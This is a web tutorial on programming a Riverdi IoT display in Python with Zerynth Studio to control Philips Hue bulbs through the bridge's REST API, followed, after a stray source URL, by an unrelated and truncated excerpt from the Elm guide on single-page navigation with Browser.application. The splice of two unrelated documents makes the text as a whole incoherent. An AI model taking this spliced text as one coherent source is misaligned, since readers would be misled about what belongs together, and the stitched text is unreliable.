- IoT software in Python – it’s easier than you think!
- Start writing the code
- Programming in Python with Zerynth Studio
- Graphical interface
- OKdo IoT Cloud
About Riverdi IoT Display displays and the Philips Hue system
The aim of the presented our partnership with Zerynth, the Zerynth programming environment will enable us.
.jpg?w=815)
Figure 1 - the back of the Riverdi IoT display
The main task for the Riverdi IoT Display module will be to establish communication with the Philips Hue intelligent lighting system. In the described case, the lighting system consists of two light bulbs with simple on/off control and one RGB bulb, controlled by determining the hue, brightness, and colour saturation parameters. The heart of the system is Philips Hue Bridge, connected to the local area network using an Ethernet cable and communicating with light bulbs using the ZigBee protocol. The block diagram of the existing configuration and its planned expansion with an intelligent control panel module is shown in Figure 2.
Figure 2. Block diagram of the projected lighting control system
IoT software in Python – it’s easier than you think!
The chosen hardware solution allows us to quickly move to issues related directly to the software. This process starts with the download of an integrated and cross-platform (made available for Windows, Linux, and macOS) programming environment called Zerynth Studio.
The entire installation process of Zerynth Studio runs in a standard manner for the selected operating system. When the installer is started for the first time, the user will be asked to accept the license agreement and choose the installation method (online or offline installation – if the user has previously downloaded library repositories). The last step in the installation process is the choice of the software version (at the time of creating the article, the last available version is the version r2.3.0):
Figure 3. The software version selection window
Now, our environment is ready for work. But before we start writing the first lines of code, it is worth creating a simple block diagram, showing the way the designed application works – Figure 4.
Figure 4. A block diagram showing the way the application design works
We start the application by configuring the display and displaying a simple logo, which will allow us to ensure that the first configuration process has run correctly. In the next step, we connect to the WiFi network defined directly in the program (saving the SSID of the network and the access password is not the safest solution, but for the needs of the home control system that is fully sufficient).
After a successful connection to the WiFi network, the system user will be asked to enter the IP address of the Philips Hue Bridge device. The correctness of the entered IP address is verified by an attempt to read the device status. The penultimate step – before displaying the main application interface – is the process of creating a new system user and its authorization (in the final solution, this stage will be executed once).
A correctly completed process for creating a new user and its authorization, allow us to go to the last level of the menu, which is the display of the control panel. As shown in Figure 2, the existing lighting system consists only of three light bulbs (including one with the possibility of colour control), so the control panel can be implemented in the form of a “single-screen”, as shown in Figure 5.
Figure 5. The main menu of the lighting control panel
Having prepared a complete block diagram of the implemented application, we can proceed to write the first lines of the code.
The process of preparing the application starts with the creation of a new project in Zerynth Studio.
In the main.py file created by default, we will place the main functionality of the program. According to the adopted block diagram from Figure 4, the application starts with the display configuration. In the Riverdi IoT Display module, the role of the graphics engine is played by the Bridgetek BT815 chip. This system acts as an intelligent bridge between the LCD display (connected to the BT815 system using a 24-bit RGB interface) and a microcontroller. A typical BT815 application is shown in Figure 6.
Figure 6. A typical BT81x application
Thanks to the use of the BT815 system, the user’s application is exempt from the obligation to create frame buffers in the RAM area and to implement low-level “drawing” functions of the interface. The BT815 system defines both a series of simple graphical objects (buttons, switches, sliders, etc.) enabling quick creation of applications as well as more complex functions related to graphics compression or media playback.
Complete documentation of the system together with the Programming Guide – presenting the possibilities of the system is available here.
With the support of the Riverdi IoT Display module, Zerynth developers have prepared a simple to use API for BT81x circuits, enabling the creation of an interface using a few simple functions. The complete Zerynth API for BT81x systems is on the documentation.
With the use of the above documentation, let’s proceed with the first changes in the main.py file. The edition starts with the import of library modules for BT81x systems and the 5-inch Riverdi display:
from bridgetek.bt81x import bt81x from riverdi.displays.bt81x import ctp50
In the next step, we initialize the display and communication via the selected SPI interface, additionally assigning the Chip Select line, Interrupt, Power Down line and the bus speed (default – 3 MHz).
For the integrated Riverdi IoT display, these values are fixed and take the form of the following line of code:
bt81x.init(SPI0, D4, D33, D34)
After the correct initialization of the system, we can proceed to display a simple logo. For this purpose, the selected graphic must be pre-loaded into the BT81x internal GRAM memory. To place the loadImage () function in the newly created gui.py file already at the first stage of the work, put in the new file:
def loadImage(image): bt81x.load_image(0, 0, image)
The task of the loadImage () function is only to call the bt81x.load_image () a method whose parameters are: the address in the GRAM memory area, additional control flags and the file name with the selected graphics. In the prepared application – in the area of GRAM memory – we will store only one graphic at a time, so the address in memory will always be set to 0. For testing purposes, we will use graphics in PNG format with the Riverdi logo of 642×144 pixels – the remaining area The image (for a 5-inch display is 800×480 pixels) will be completed with a white background. In the main.py file, loading the graphic gui_riverdi_logo.png into the GRAM memory, we will execute the following set of calls:
import gui new_resource('images/gui_riverdi_logo.png') gui.loadImage('gui_riverdi_logo.png')
For full functionality, let’s implement the showLogo () function, which displays the loaded image in the specified coordinates. For this purpose – in the gui.py file – place the following code fragment:
def showLogo(): # start bt81x.dl_start() bt81x.clear_color(rgb=(0xff, 0xff, 0xff)) bt81x.clear(1, 1, 1) # image) # display bt81x.display() bt81x.swap_and_empty()
Using the bt81x.dl_start () method, we start creating a new Display List that describes the currently created frame. Calling bt81x.clear_color () sets the colour for the image cleansing operation, which is done by the bt81x.clear () method. Using the Bitmap class, we define the parameters of the displayed image, including image source (in this case it is GRAM memory) and its size. Use the bt81x.prepare_draw () and bt81x.draw () calls to add the indicated graphics to the Display List. Each creation of the Display List by means of the bt81x.dl_start () call must be terminated by calling bt81x.display () – terminating its creation, and calling bt81x.swap_and_empty (), which changes the currently displayed content. The showLogo () function constructed in this way is called directly in the main.py file.
Communication between the control panel and the Philips Hue bridge will be made using the local network. For this purpose, it is necessary to connect the Riverdi IoT Display module to the WiFi network. Thanks to the use of the ESP32 system – integrating WiFi communication modules and Bluetooth Low Energy – the user does not have to connect any additional wireless modems. In order to establish a connection with the selected WiFi network (specified ssid variable and the access password – wifiPWD variable), in the main.py file, we will implement the following code fragment:
from wireless import wifi from espressif.esp32net import esp32wifi as wifi_driver ssid = "ssid_value" # this is the SSID of the WiFi network wifiPWD = "password_value" # this is the Password for WiFi gui.showSpinner("Connecting with predefined WiFi network...") wifi_driver.auto_init() for _ in range(0,5): try: wifi.link(ssid,wifi.WIFI_WPA2,wifiPWD) break except: gui.showSpinner("Trying to reconnect...") else: gui.showSpinner("Connection Error - restarting...") mcu.reset()
Using the for () loop and the wifi.link () method, the application attempts to connect to a defined network five times. If the operation fails completely, the mcu.reset () function will reset the device. Depending on the strength of the WiFi network signal, the linking process may be longer, so that the system user receives feedback from the graphical interface, it is informed about the progress of the process by calling the gui.showSpinner () function, which displays the animated Spinner object specified by the argument message. The showSpinner () function is defined in the gui.py file:
def showSpinner(msg): bt81x.dl_start() bt81x.clear(1, 1, 1) txt = bt81x.Text(400, 350, 30, bt81x.OPT_CENTERX | bt81x.OPT_CENTERY, msg, ) bt81x.add_text(txt) bt81x.spinner(400, 240, bt81x.SPINNER_CIRCLE, 0) bt81x.display() bt81x.swap_and_empty()
Using the above function, in the newly created Display List we place elements like Spinner and Text – the whole list is closed with calls bt81x.display () and bt81x.swap_and_empty (). The resulting graphic effect is shown in Figure 7.
Figure 7. A screen with a Spinner object informing the user about the progress of processes
In the next step – after successfully connecting to the WiFi network – we can start to create a graphical interface that allows entering the IP address assigned to the Philips Hue Bridge device. For the construction of the interface, we use the bt81x.add_keys () method, which places a single row of buttons in Display List – for an example call:
bt81x.add_keys(450, 70, 280, 60, 30, 0, "123")
The obtained effect will look like this:
Figure 8. A single line of buttons created using bt81x.add_keys ()
Graphical interface
Let’s go back to the operation of preparing the graphical interface. The screen for entering the IP address will consist of a 4-line keyboard (digits from 0-9, a dot symbol and a button to delete incorrectly entered values), a Connect button and a simple graphic. The entire operation was implemented in the form of the showAddrScreen () function in the gui.py file:
def showAddrScreen(ip): # start bt81x.dl_start() bt81x.clear(1, 1, 1) # image image = bt81x.Bitmap(1, 0, (bt81x.ARGB4, 200 * 2), (bt81x.BILINEAR, bt81x.BORDER, bt81x.BORDER, 200, 200)) image.prepare_draw() image.draw((0, 255), vertex_fmt=0) # text txt = bt81x.Text(225, 120, 29, bt81x.OPT_CENTERX | bt81x.OPT_CENTERY, "Enter IP address of HUE Bridge:", ) bt81x.add_text(txt) txt.text = ip txt.x = 225 txt.y = 195 txt.font = 31 bt81x.add_text(txt) # keys bt81x.track(450, 350, 280, 60, 0) bt81x.add_keys(450, 70, 280, 60, 30, 0, "123") bt81x.add_keys(450, 140, 280, 60, 30, 0, "456") bt81x.add_keys(450, 210, 280, 60, 30, 0, "789") bt81x.add_keys(450, 280, 280, 60, 30, 0, ".0C") # connect button btn = bt81x.Button(450, 350, 280, 60, 30, 0, "Connect") bt81x.tag(1) bt81x.add_button(btn) bt81x.display() bt81x.swap_and_empty()
By using the bt81x.tag () method in the showAddrScreen () function, the value of the TAG identifier is assigned to the Connect button. The buttons from the keypad generated by a series of calls bt81x.add_keys (), as the TAG field, return ASCII codes corresponding to the individual key labels. Handling of all events is performed in the push function pressed (), as defined in the call bt81x.touch_loop (). A fragment of the pressed () function – associated with keyboard support – is shown below:
def pressed(tag, tracked, tp): # entering HUE IP if (screenLayout == 2): global hueIP global screenLayout # emit sound beep() # remove last character if (tag != 67): # max length of IP if len(hueIP) >= 15: return hueIP = hueIP + str(chr(tag)) else: if len(hueIP) > 0: hueIP = hueIP[:-1] # connect -> go to next screen if (tag == 1): hueIP = hueIP[:-1] screenLayout = 3
The call to the showAddrScreen () function is performed in the while () loop (in the main.py file) until the Connect button is selected (this process is repeated if the entered IP address of the device is incorrect):
gui.loadImage('gui_addr_hue.png') while True: # enter IP address of HUE gateway screenLayout = 2 while (screenLayout == 2): gui.showAddrScreen(hueIP) # show spinner (looking for HUE) screenLayout = 3 gui.showSpinner("Looking for HUE Bridge...") # check HUE availability status = hue.testConnection(hueIP) if (status): break;
The final effect of calling the showAddrScreen () function is shown in Figure 9.
Figure 9. Interface to enter the IP address of the Philips Hue Bridge device
After the correct indication of the IP address of the Philips Hue Bridge device, the control panel will go to the authorization stage (issues related directly to establishing a connection, authorization and communication protocol with Philips Hue Bridge, will be discussed later in the article). At this point, the message displayed to the user will be limited only to a simple graphic and a short message asking you to press the button located on the Philips bridge housing (it is a confirmation that the system user has physical access to the device). For displaying the message and graphics, the showAuthScreen () function from the gui.py file will be responsible:
def showAuthScreen(): bt81x.dl_start() bt81x.clear(1, 1, 1) image = bt81x.Bitmap(1, 0, (bt81x.ARGB4, 420 * 2), (bt81x.BILINEAR, bt81x.BORDER, bt81x.BORDER, 420, 480)) image.prepare_draw() image.draw((0, 0), vertex_fmt=0) txt = bt81x.Text(590, 220, 28, bt81x.OPT_CENTERX | bt81x.OPT_CENTERY, "Press the push-link button of the Hue", ) bt81x.add_text(txt) txt.text = "bridge you want to connect to" txt.x = 590 txt.y = 260 bt81x.add_text(txt) bt81x.display() bt81x.swap_and_empty()
In the main.py file – before displaying the message asking for authorization – add a short intermediate screen (using the previously prepared function showSpinner ()). During this time, to the GRAM memory of the BT81x controller, we upload the graphic file gui_auth_hue.png, which is used in the construction of the interface from the function showAuthScreen (). All operations will be performed in the while () loop until the user is properly authorized (the createUser () function will be discussed later in the article):
gui.showSpinner("Creating new user...") gui.loadImage('gui_auth_hue.png') while True: # show authScreen screenLayout = 5 gui.showAuthScreen() # check status username = hue.createUser(hueIP) if (username): break;
Leaving the above while () loop is tantamount to successfully terminating the connection process with Philips Hue Bridge. So the time has come to display the main control screen, consisting of ON / OFF buttons for two bulbs and control elements for one “coloured” light bulb. Before we go on to discuss the code snippets, let’s look at the final effect presented in Figure 10 beforehand.
Figure 10. The interface of the main control panel
The main control panel is definitely more extensive than the previous screens of the application – a single addition of 10 buttons and 8 text elements would complicate the main function very much, and the possible introduction of adjustments of the positions of individual interface elements would be very tedious. For this purpose, all components of the main interface are described using the JSON array, and their placement on the Display List, grouped into two for () loops (separate for Button and Text elements). Fragments of JSON descriptions are presented below:
buttons = [ { "tag_id": 2, "text": "ON", "x_cord": 50, "y_cord": 200, "width": 170, "height": 50, "size": 30 }, { "tag_id": 3, "text": "OFF", "x_cord": 50, "y_cord": 300, "width": 170, "height": 50, "size": 30 }, /.../ { "tag_id": 11, "text": ">", "x_cord": 675, "y_cord": 350, "width": 50, "height": 50, "size": 30 }, ] labels = [ { "text": "Kitchen", "x_cord": 136, "y_cord": 140, "size": 31, "options": bt81x.OPT_CENTER }, /.../ { "text": "Brightness", "x_cord": 622, "y_cord": 330, "size": 28, "options": bt81x.OPT_CENTER }, ]
For parsing individual elements of the JSON description, adding them to the Display List and its final display corresponds to the showMainMenu () function placed in the gui.py file:
def showMainMenu(saturation, hue, brightness): bt81x.dl_start() bt81x.clear(1, 1, 1) image = bt81x.Bitmap(1, 0, (bt81x.ARGB4, 800 * 2), (bt81x.BILINEAR, bt81x.BORDER, bt81x.BORDER, 800, 50)) image.prepare_draw() image.draw((0, 0), vertex_fmt=0) btn = bt81x.Button(0, 0, 170, 70, 31, 0, "") for button in buttons: btn.text = button["text"] btn.font = button["size"] btn.x = button["x_cord"] btn.y = button["y_cord"] btn.width = button["width"] btn.height = button["height"] bt81x.track(btn.x, btn.y, button["width"], button["height"], button["tag_id"]) bt81x.tag(button["tag_id"]) bt81x.add_button(btn) txt = bt81x.Text(0, 0, 0, 30, "") for label in labels: txt.text = label["text"] txt.x = label["x_cord"] txt.y = label["y_cord"] txt.font = label["size"] txt.options = label["options"] bt81x.add_text(txt) # saturation value label txt.text = str(int((saturation/240)*100)) + '%' txt.x = 622 txt.y = 175 txt.font = 30 txt.options = bt81x.OPT_CENTER bt81x.add_text(txt) /.../ # brightness value label txt.text = str(int((brightness/240)*100)) + '%' txt.x = 622 txt.y = 375 txt.font = 30 txt.options = bt81x.OPT_CENTER bt81x.add_text(txt) # display bt81x.display() bt81x.swap_and_empty()
The cyclic call to the showMainMenu () function has been placed in the main.py file in the main program loop. The main loop updates the values presented in the graphical interface, checks the status of variables representing states of controlled bulbs and in the event of changes (resulting from touch panel operation and event handling in the call function pressed ()) sends messages to the Philips Hue Bridge device:
while True: gui.showMainMenu(saturation_old_value, hue_old_value, brightness_old_value) if (bulb_1_new_value != bulb_1_old_value): hue.turnLight(hueIP, username ,"4", bulb_1_new_value) bulb_1_old_value = bulb_1_new_value if (bulb_2_new_value != bulb_2_old_value): hue.turnLight(hueIP, username ,"2", bulb_2_new_value) bulb_2_old_value = bulb_2_new_value if (saturation_new_value != saturation_old_value): hue.changeColor(hueIP,username,"3",True, saturation_new_value,brightness_new_value, hue_new_value) saturation_old_value = saturation_new_value if (hue_new_value != hue_old_value): hue.changeColor(hueIP,username,"3",True,saturation_new_value, brightness_new_value, hue_new_value) hue_old_value = hue_new_value if (brightness_new_value != brightness_old_value): hue.changeColor(hueIP,username,"3", True,saturation_new_value,brightness_new_value, hue_new_value) brightness_old_value = brightness_new_value
The updated fragment of the pressed () function is shown below:
def pressed(tag, tracked, tp): # entering HUE IP if (screenLayout == 2): /.../ # mainmenu screen elif (screenLayout == 7): global bulb_1_new_value global bulb_2_new_value # on/off switching if (tag == 2): bulb_1_new_value = True elif (tag == 3): bulb_1_new_value = False elif (tag == 4): bulb_2_new_value = True elif (tag == 5): bulb_2_new_value = False elif (tag == 6): if (saturation_new_value > 0): saturation_new_value -= 24 elif (tag == 7): if (hue_new_value > 0): hue_new_value -= 6550 /…/ elif (tag == 11): if (brightness_new_value < 240): brightness_new_value += 24
We have successfully managed to omit all aspects of communication with the Philips Hue bridge, but it’s time to devote a few moments to this device and how it communicates with the world. In the most popular configuration, Philips Hue Bridge acts as an intermediary in communication between the mobile application and terminal devices. The programmers of the Philips Hue system, however, went a step further and instead of creating a closed system on the line mobile application <-> bridge, they decided to prepare an open and well-documented API, thus allowing external programmers to create their own control and system management devices.
A set of information related to the creation of own applications has been made available here.
Another nod to programmers is to create a simple interface that allows testing the API and system operation without creating a dedicated application. This interface – called the CLIP API Debugger – has been made available at:
The address of the Philips bridge can be determined by using the UPnP protocol, through or by reading the configuration of the home router)
The appearance of the CLIP API Debugger interface window is shown in Figure 11.
Figure 11. The interface of the CLIP API Debugger panel
Communication with Philips Hue Bridge is carried out using HTTPS and REST API calls, so the interface window has been divided into the URL field, the choice of method type (GET, PUT, POST or DELETE) and the BODY section in which JSON queries are placed.
Before we move on to the question of controlling the work of light bulbs, it is necessary to create a new user and its authorization beforehand. To create a new user, make the following call:
URL: /api Body: {"devicetype":"my_hue_app#Riverdi IoT Display"} Method: POST
In response, we’ll get:
[ { "error": { "type": 101, "address": "", "description": "link button not pressed" } } ]
To increase the security of the system, it is necessary to properly authorize the user. In the received communication, the user is asked to press a button placed on the device casing – this procedure is to confirm that the person attempting to gain access to the lighting control also has physical access to the control bridge. Pressing the button and re-sending the POST request above will be confirmed by the following message:
[ { "success": { "username": "JxeQj8Xvi1zLDBnDz09w1aCjWA80rDxbQNYUlOCn" } } ]
The value of the username field is the new name of the authorized user, which will be used in further communication. However, let’s get back to the code of our application for a moment and consider how to accomplish the above tasks using Python and a set of libraries provided by Zerynth. The request module comes with help (for Python programmers this name is probably well known – this module – for the API is inspired by a quite popular module with the same name). This module enables fast implementation of HTTP support and GET, POST, PUT and DELETE calls in the form of single functions. The full API documentation for the requests module is available at the Zerynth docs.
The createUser () function – based on calls from the requests module – responsible for creating a new user is defined in the hue.py file:
def createUser(ip): try: response = requests.post("http://" + ip + "/api", json={"devicetype": "my_hue_app#Riverdi IoT Display"}) js = json.loads(response.content) return js[0]["success"]["username"]; except Exception as e: return None;
The above function is performed in a loop until the value of success in the response returned by the bridge is read. To the main program loop, this function returns the value read from the username field, which will be used in subsequent calls controlling the status of light bulbs:
while True: # show authScreen screenLayout = 5 gui.showAuthScreen() # check status username = hue.createUser(hueIP) if (username): # todo save user and password to flash break;
Obtaining the name of an authorized user allows us to read the system configuration, i.e. list of connected bulbs, their status, identification numbers, etc .:
URL: /api//lights
Body: [none]
Method: GET
The fragment of the system response (for a configuration with three bulbs – as shown in Figure 2) is shown below:
{ "2": { "state": { "on": false, "bri": 254, "alert": "select", "mode": "homeautomation", "reachable": false }, "swupdate": { "state": "noupdates", "lastinstall": "2019-06-06T12:55:19" }, "type": "Dimmable light", "name": "Hue white lamp 2", "modelid": "LWB010", "manufacturername": "Philips", "productname": "Hue white lamp", "capabilities": { "certified": true, "control": { "mindimlevel": 2000, "maxlumen": 806 }, "streaming": { "renderer": false, "proxy": false } }, "config": { "archetype": "classicbulb", "function": "functional", "direction": "omnidirectional", "startup": { "mode": "safety", "configured": true } }, /.../ }, "3": { "state": { "on": false, "bri": 24, "hue": 45850, "sat": 240, "effect": "none", "xy": [ 0.1666, 0.1016 ], "ct": 153, "alert": "select", "colormode": "hs", "mode": "homeautomation", "reachable": false }, "swupdate": { "state": "readytoinstall", "lastinstall": "2019-07-04T12:22:06" }, "type": "Extended color light", "name": "Hue color lamp 1", "modelid": "LCT015", "manufacturername": "Philips", "productname": "Hue color lamp", "capabilities": { "certified": true, "control": { "mindimlevel": 1000, "maxlumen": 806, "colorgamuttype": "C", "colorgamut": [ [ 0.6915, 0.3083 ], [ 0.17, 0.7 ], [ 0.1532, 0.0475 ] ], "ct": { "min": 153, "max": 500 } }, "streaming": { "renderer": true, "proxy": true } }, "config": { "archetype": "sultanbulb", "function": "mixed", "direction": "omnidirectional" }, /.../ }, "4": { "state": { "on": false, "bri": 254, "alert": "select", "mode": "homeautomation", "reachable": false }, "swupdate": { "state": "transferring", "lastinstall": "2019-07-05T12:53:52" }, "type": "Dimmable light", "name": "Hue white lamp 3", "modelid": "LWB010", "manufacturername": "Philips", "productname": "Hue white lamp", "capabilities": { "certified": true, "control": { "mindimlevel": 5000, "maxlumen": 806 }, "streaming": { "renderer": false, "proxy": false } }, "config": { "archetype": "classicbulb", "function": "functional", "direction": "omnidirectional" }, /.../ } }
The current status of individual lamps can be checked by adding the device’s identification address number in the GET query, eg:
URL: /api / lights / 2
Body: [none]
Method: GET
Changing the standard status of the light bulb is carried out by calling the PUT method:
URL: /api / lights / 2 / state Body: { "a": false} Method: PUT
Changing the status of a coloured light requires the user to specify not only its new state of work but also to determine the value of colour, brightness and saturation:
URL: / api / lights / 2 / state Body: {"on": true, "sat": 254, "bri": 254, "hue": 10000} Method: PUT
Based on the above API – using the requests module – the turnLight () and changeColour () functions were prepared:
def turnLight(ip,user,num,state): try: addr = "http://" + ip + "/api/" + user + "/lights/" + num + "/state" requests.put(addr, json={"on":state}) except Exception as e: return None; def changeColor(ip,user,num,state, sat, bri, hue): try: addr = "http://" + ip + "/api/" + user + "/lights/" + num + "/state" requests.put(addr, json={"on":state, "sat":sat, "bri":bri, "hue":hue}) except Exception as e: return None;
OKdo IoT Cloud
Is this the end of the possibilities of this extraordinary mix which is Riverdi IoT Display and the Zerynth environment? Certainly not! To provide remote control over the lighting system, the application can be extended in several lines of code with the possibility of remote synchronization with the OKdo IoT Cloud solution [6]. This solution allows us to remotely monitor and control our lighting system by using a mobile device or web interface.
The OKdo Cloud is free, and you can easily sign up for the account, on the official page linked above. As they say on the OKdo Cloud page:
“Connect your things and interact with them for free on the OKdo Cloud.”
OKdo IoT Cloud provides connectivity endpoints for MQTT, HTTP, and UDP protocols.
Details related to the API for communication with the OKdo IoT Cloud are provided on the Zerynth docs.
The full application source code is available on the Riverdi GitHub repository.
Resources:
[1]
[2]
[3]
[4]
[5]
[6]
|
https://www.rs-online.com/designspark/philips-hue-intelligent-lighting-control-panel-demo-in-python-using-riverdi-iot-displays-and-zerynth-studio
|
CC-MAIN-2019-39
|
refinedweb
| 4,581
| 54.63
|
So I am just trying to make an array of objects of my custom class bcLED and I am getting the error.
error: no match for 'operator=' (operand types are 'bcLed' and 'bcLed*')
Can some one tell me why? I know it will be something simple.
also why i am here is there a way to create an array of an unspecified length in C++ and then just append it with an new row each time I want to add an object to it?
void PopulateLEDS(){
int i;
bcLed ledArr[17];
for (i = 0; i< 16; i++)
{
ledArr[i] = new bcLed();
ledArr[i].id = i;
ledArr[i].charge = 0;
}
}
/Users/bencawley/Documents/Arduino/Test/Bens_Lights/Bens_Lights.ino: In function 'void PopulateLEDS()':
Bens_Lights:49: error: expected primary-expression before 'public'
public:bcLed ledArr[17];
^
Bens_Lights:52: error: 'ledArr' was not declared in this scope
ledArr[i].id = i;
^
/Users/bencawley/Documents/Arduino/Test/Bens_Lights/Bens_Lights.ino: In function 'void BensPattern(uint8_t)':
Bens_Lights:69: error: 'ledArr' was not declared in this scope
strip.setPixelColor(i,0, 0, ledArr[i].charge, 0);
^
Using library Adafruit_NeoPixel at version 1.0.6 in folder: /Users/bencawley/Documents/Arduino/libraries/Adafruit_NeoPixel
exit status 1
expected primary-expression before 'public'
class bcLed{
public:int id;
public:int charge;
void incCharge(int amt)
{
charge = charge+amt;
if(charge >= 255){charge = 255;}
}
};
void setup() {
strip.begin();
strip.show(); // Initialize all pixels to 'off'
PopulateLEDS();
}
void loop() {
// Some example procedures showing how to display to the pixels:
BensPattern(45);
}
void PopulateLEDS(){
int i;
bcLed ledArr[17];
for (i = 0; i< 17; i++)
{
ledArr[i].id = i;
ledArr[i].charge = 0;
}
}
void BensPattern(uint8_t wait)
{
uint16_t i, j;
int rn = rand() % strip.numPixels() ;
for (i = 0; i<strip.numPixels(); i++)
{
strip.setPixelColor(i,0, 0, 0, 0);
}
for (i = 0; i<rn; i++)
{
strip.setPixelColor(i,0, 0, ledArr[i].charge, 0);
ledArr[i].incCharge(1);
}
strip.show();
delay(wait);
}
new isn't always needed in C++, and definitely not here.
new allocates dynamic memory for you if automatic allocation isn't good enough for you. You usually only use
new if you want the variable to outlive it's scope. Memory allocated with
new must also always be
deleted in order to avoid a memory leak. In modern C++, the use of
new is even less needed because we have smart pointers.
bcLed ledArr[17];
This already creates 17
bcLeds for you (like how you would use
new in C#, requires no cleanup), no need to use
new on them. Just work with them.. Your loop condition is wrong too, it's supposed to be
< 17.
for (i = 0; i < 17; i++) { ledArr[i].id = i; ledArr[i].charge = 0; }
also why i am here is there a way to create an array of an unspecified length in C++ and then just append it with an new row each time I want to add an object to it?
Yes, that's what a
std::vector is for:
#include <vector> std::vector<bcLed> ledArr(17); //loop over them: for(int i = 0; i < ledArr.size(); ++i) { //ledArr[i] } //or: for(std::vector<bcLed>::iterator itr = ledArr.begin() itr != ledArr.end(); ++itr) { //*itr } // to insert to the back of the vector use push_back: bcLed aLed; ledArr.push_back(aLed);
If you have access to C++11 you can use a range based loop instead and use
emplace_back:
#include <vector> std::vector<bcLed> ledArr(17); //loop over them, just to iterate: for(const auto& led : ledArr) { //led.id //led.charge } //appending to the vector: ledArr.emplace_back(/*constructor arguments*/);
To answer your comment
ok im going to brave and ask this when you say "if you want the variable to outlive it's scope or you're working with low level memory" I don't understand what any of that means... well mostly I don't understand what you mean by scope or low level memory. Could you explain those? is scope the time that the method runs for?
A scope of a variable is the context in which it is defined. Automatic storage lives until the end of it's scope. Braces
{ } indicate scope. For example:
void foo() { int x; bcLed aLed; { //create a new inner scope bcLed innerLed; } //scope ends, all automatic variables are destroyed (innerLed in this case) //can't use `innerLed` here. int new_int = x; } // scope ends, same goes, new_int, x, aLed are destroyed.
Really though, a good book will tell you the differences and when they should be used.
|
https://codedump.io/share/0LFEHtMo8xr0/1/c-so-why-error-no-match-for-39operator39
|
CC-MAIN-2017-04
|
refinedweb
| 749
| 66.23
|
4.42: Why Bother Having a main() Function?
- Page ID
- 14488
if __name__ == '__main__': main()
It may seem pointless to have a
main() function, since you could just put that code in the global scope at the bottom of the program instead, and the code would run the exact same. However, there are two good reasons to put them inside of a
main() function.
First, this lets you have local variables whereas otherwise the local variables in the
main() function would have to become global variables. Limiting the number of global variables is a good way to keep the code simple and easier to debug. (See the "Why Global Variables are Evil" section in this chapter.)
Second, this also lets you import the program so that you can call and test individual functions. If the memorypuzzle.py file is in the C:\Python32 folder, then you can import it from the interactive shell. Type the following to test out the
splitIntoGroupsOf() and
getBoxAtPixel() functions to make sure they return the correct return values:
>>> import memorypuzzle >>> memorypuzzle.splitIntoGroupsOf(3, [0,1,2,3,4,5,6,7,8,9]) [[0, 1, 2], [3, 4, 5], [6, 7, 8], [9]] >>> memorypuzzle.getBoxAtPixel(0, 0) (None, None) >>> memorypuzzle.getBoxAtPixel(150, 150) (1, 1)
When a module is imported, all of the code in it is run. If we didn’t have the
main() function, and had its code in the global scope, then the game would have automatically started as soon as we imported it, which really wouldn’t let us call individual functions in it.
That’s why the code is in a separate function that we have named
main(). Then we check the built-in Python variable
__name__ to see if we should call the
main() function or not. This variable is automatically set by the Python interpreter to the string
'__main__' if the program itself is being run and
'memorypuzzle' if it is being imported. This is why the
main() function is not run when we executed the
import memorypuzzle statement in the interactive shell.
This is a handy technique for being able to import the program you are working on from the interactive shell and make sure individual functions are returning the correct values by testing them one call at a time.
|
https://eng.libretexts.org/Bookshelves/Computer_Science/Programming_Languages/Book%3A_Making_Games_with_Python_and_Pygame_(Sweigart)/04%3A_Memory_Puzzle/4.42%3A_Why_Bother_Having_a_main()_Function%3F
|
CC-MAIN-2022-21
|
refinedweb
| 383
| 60.65
|
Navigation
We just saw how to serve one page, but say we are making a website like
package.elm-lang.org. It has a bunch of pages (e.g. search, README, docs) that all work differently. How does it do that?
Multiple Pages
The simple way would be to serve a bunch of different HTML files. Going to the home page? Load new HTML. Going to
elm/core docs? Load new HTML. Going to
elm/json docs? Load new HTML.
Until Elm 0.19, that is exactly what the package website did! It works. It is simple. But it has some weaknesses:
- Blank Screens. The screen goes white every time you load new HTML. Can we do a nice transition instead?
- Redundant Requests. Each package has a single
docs.jsonfile, but it gets loaded each time you visit a module like
Stringor
Maybe. Can we share the data between pages somehow?
- Redundant Code. The home page and the docs share a lot of functions, like
Html.textand
Html.div. Can this code be shared between pages?
We can improve all three cases! The basic idea is to only load HTML once, and then be a bit tricky to handle URL changes.
Single Page
Instead of creating our program with
Browser.element or
Browser.document, we can create a
Browser.application to avoid loading new HTML when the URL changes:
application : { init : flags -> Url -> Key -> ( model, Cmd msg ) , view : model -> Document msg , update : msg -> model -> ( model, Cmd msg ) , subscriptions : model -> Sub msg , onUrlRequest : UrlRequest -> msg , onUrlChange : Url -> msg } -> Program flags model msg
It extends the functionality of
Browser.document in three important scenarios.
When the application starts,
init gets the current
Url from the browsers navigation bar. This allows you to show different things depending on the
Url.
When someone clicks a link, like
<a href="/home">Home</a>, it is intercepted as a
UrlRequest. So instead of loading new HTML with all the downsides,
onUrlRequest creates a message for your
update where you can decide exactly what to do next. You can save scroll position, persist data, change the URL yourself, etc.
When the URL changes, the new
Url is sent to
onUrlChange.
The resulting message goes to
update where you can decide how to show the new page.
So rather than loading new HTML, these three additions give you full control over URL changes. Let’s see it in action!
Example
We will start with the baseline
Browser.application program. It just keeps track of the current URL. Skim through the code now! Pretty much all of the new and interesting stuff happens in the
update function, and we will get into those details after the code:
import Browser import Browser.Navigation as Nav import Html exposing (..) import Html.Attributes exposing (..) import Url -- MAIN main : Program () Model Msg main = Browser.application { init = init , view = view , update = update , subscriptions = subscriptions , onUrlChange = UrlChanged , onUrlRequest = LinkClicked } -- MODEL type alias Model = { key : Nav.Key , url : Url.Url } init : () -> Url.Url -> Nav.Key -> ( Model, Cmd Msg ) init flags url key = ( Model key url, Cmd.none ) -- UPDATE type Msg = LinkClicked Browser.UrlRequest | UrlChanged Url.Url update : Msg -> Model -> ( Model, Cmd Msg ) update msg model = case msg of LinkClicked urlRequest -> case urlRequest of Browser.Internal url -> ( model, Nav.pushUrl model.key (Url.toString url) ) Browser.External href -> ( model, Nav.load href ) UrlChanged url -> ( { model | url = url } , Cmd.none ) -- SUBSCRIPTIONS subscriptions : Model -> Sub Msg subscriptions _ = Sub.none -- VIEW view : Model -> Browser.Document Msg view model = { title = "URL Interceptor" , body = [ text "The current URL is: " , b [] [ text (Url.toString model.url) ] , ul [] [ viewLink "/home" , viewLink "/profile" , viewLink "/reviews/the-century-of-the-self" , viewLink "/reviews/public-opinion" , viewLink "/reviews/shah-of-shahs" ] ] } viewLink : String -> Html msg viewLink path = li [] [ a [ href path ] [ text path ] ]
The
update function can handle either
LinkClicked or
UrlChanged messages. There is a lot of new stuff in the
LinkClicked branch, so we will focus on that first!
UrlRequest
Whenever someone clicks a link like
